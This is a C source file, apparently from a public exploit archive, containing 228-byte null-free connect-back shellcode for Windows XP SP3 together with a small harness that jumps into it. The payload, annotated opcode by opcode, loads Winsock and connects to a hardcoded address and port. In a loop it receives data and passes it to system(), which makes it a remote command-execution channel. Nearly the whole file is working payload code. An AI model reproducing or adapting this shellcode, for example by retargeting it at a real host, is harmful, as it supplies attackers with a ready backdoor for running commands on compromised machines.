/*------------------------------------------------------------------------
  Title...................Windows XP SP3 EN Null-free Connect Back Shellcode 228 Bytes
  Release Date............12/7/2010
  Tested On...............Windows XP SP3 EN
  ------------------------------------------------------------------------
  Author..................John Leitch
  Site....................http://www.johnleitch.net/
  Email...................john.leitch5@gmail.com
  ------------------------------------------------------------------------*/

int main(int argc, char *argv[])
{
	// Listen on 127.0.0.1:5230
    char* shellcode=
        "\x33\xDB"                      // xor         ebx,ebx
        "\xC7\x45\x08\x40\xAE\x80\x7C"  // mov         dword ptr [argc],7C80AE40h
        "\xC7\x45\x04\x7B\x1D\x80\x7C"  // mov         dword ptr [ebp+4],7C801D7Bh
        "\x68\x64\x6C\x6C\x01"          // push        16C6C64h
        "\xD0\x6C\x24\x03"              // shr         byte ptr [esp+3],1
        "\x68\x6B\x33\x32\x2E"          // push        2E32336Bh
        "\x68\x77\x73\x6F\x63"          // push        636F7377h
        "\x54"                          // push        esp
        "\xFF\x55\x04"                  // call        dword ptr [ebp+4]
        "\x8B\xF0"                      // mov         esi,eax
        "\x53"                          // push        ebx
        "\xC6\x04\x24\x75"              // mov         byte ptr [esp],75h
        "\xC6\x44\x24\x01\x70"          // mov         byte ptr [esp+1],70h
        "\x68\x74\x61\x72\x74"          // push        74726174h
        "\x68\x57\x53\x41\x53"          // push        53415357h
        "\x54"                          // push        esp
        "\x56"                          // push        esi
        "\xFF\x55\x08"                  // call        dword ptr [argc]
        "\x83\xEC\x7F"                  // sub         esp,7Fh
        "\x83\xEC\x7F"                  // sub         esp,7Fh
        "\x83\xEC\x7F"                  // sub         esp,7Fh
        "\x83\xEC\x13"                  // sub         esp,13h
        "\x54"                          // push        esp
        "\x54"                          // push        esp
        "\xFF\xD0"                      // call        eax
        "\x53"                          // push        ebx
        "\xC6\x04\x24\x65"              // mov         byte ptr [esp],65h
        "\xC6\x44\x24\x01\x74"          // mov         byte ptr [esp+1],74h
        "\x68\x73\x6F\x63\x6B"          // push        6B636F73h
        "\x54"                          // push        esp
        "\x56"                          // push        esi
        "\xFF\x55\x08"                  // call        dword ptr [argc]
        "\x53"                          // push        ebx
        "\x6A\x01"                      // push        1
        "\x6A\x02"                      // push        2
        "\xFF\xD0"                      // call        eax
        "\x89\x45\xFC"                  // mov         dword ptr [ebp-4],eax
        "\x68\x65\x63\x74\x01"          // push        1746365h
        "\xD0\x6C\x24\x03"              // shr         byte ptr [esp+3],1
        "\x68\x63\x6F\x6E\x6E"          // push        6E6E6F63h
        "\x54"                          // push        esp
        "\x56"                          // push        esi
        "\xFF\x55\x08"                  // call        dword ptr [argc]
        "\x6A\x01"                      // push        1
        "\x6A\x7F"                      // push        7Fh
        "\xC6\x44\x24\x03\x01"          // mov         byte ptr [esp+3],1
        "\x68\x02\x01\x14\x6E"          // push        6E140102h
        "\xD0\x6C\x24\x01"              // shr         byte ptr [esp+1],1
        "\x8B\xFC"                      // mov         edi,esp
        "\x6A\x10"                      // push        10h
        "\x57"                          // push        edi
        "\xFF\x75\xFC"                  // push        dword ptr [ebp-4]
        "\xFF\xD0"                      // call        eax
        "\x53"                          // push        ebx
        "\x68\x72\x65\x63\x76"          // push        76636572h
        "\x54"                          // push        esp
        "\x56"                          // push        esi
        "\xFF\x55\x08"                  // call        dword ptr [argc]
        "\x53"                          // push        ebx
        "\x6A\x7F"                      // push        7Fh
        "\x57"                          // push        edi
        "\xFF\x75\xFC"                  // push        dword ptr [ebp-4]
        "\xFF\xD0"                      // call        eax
        "\x53"                          // push        ebx
        "\xC6\x04\x24\x6C"              // mov         byte ptr [esp],6Ch
        "\xC6\x44\x24\x01\x6C"          // mov         byte ptr [esp+1],6Ch
        "\x68\x72\x74\x2E\x64"          // push        642E7472h
        "\x68\x6D\x73\x76\x63"          // push        6376736Dh
        "\x54"                          // push        esp
        "\xFF\x55\x04"                  // call        dword ptr [ebp+4]
        "\x53"                          // push        ebx
        "\xC6\x04\x24\x65"              // mov         byte ptr [esp],65h
        "\xC6\x44\x24\x01\x6D"          // mov         byte ptr [esp+1],6Dh
        "\x68\x73\x79\x73\x74"          // push        74737973h
        "\x54"                          // push        esp
        "\x50"                          // push        eax
        "\xFF\x55\x08"                  // call        dword ptr [argc]
        "\x57"                          // push        edi
        "\xFF\xD0"                      // call        eax
        "\xEB\xBB"                      // jmp         recv_loop (4010B3h)
        ;
 
    printf("shellcode length: %i", strlen(shellcode));
 
    __asm jmp shellcode
  
    return 0;
}